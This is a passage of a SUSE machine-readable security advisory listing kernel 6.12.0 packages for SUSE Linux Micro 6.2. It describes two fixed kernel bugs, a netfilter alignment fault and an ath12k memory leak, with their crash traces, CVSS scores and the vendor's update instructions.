"name": "kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-livepatch-6.12.0-160000.26.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-devel-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-macros-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-livepatch-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.12.0-160000.26.1.noarch as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocumentation it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-37744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_pci_remove()\n\nKmemleak reported this error:\n\n unreferenced object 0xffff1c165cec3060 (size 32):\n comm \"insmod\", pid 560, jiffies 4296964570 (age 235.596s)\n backtrace:\n [\u003c000000005434db68\u003e] __kmem_cache_alloc_node+0x1f4/0x2c0\n [\u003c000000001203b155\u003e] kmalloc_trace+0x40/0x88\n [\u003c0000000028adc9c8\u003e] _request_firmware+0xb8/0x608\n [\u003c00000000cad1aef7\u003e] firmware_request_nowarn+0x50/0x80\n [\u003c000000005011a682\u003e] local_pci_probe+0x48/0xd0\n [\u003c00000000077cd295\u003e] pci_device_probe+0xb4/0x200\n [\u003c0000000087184c94\u003e] really_probe+0x150/0x2c0\n\nThe firmware memory was allocated in ath12k_pci_probe(), but not\nfreed in ath12k_pci_remove() in case ATH12K_FLAG_QMI_FAIL bit is\nset. So call ath12k_fw_unmap() to free the memory.\n\nTested-on: WCN7850 hw2.0 PCI WLAN.HMT.2.0-02280-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
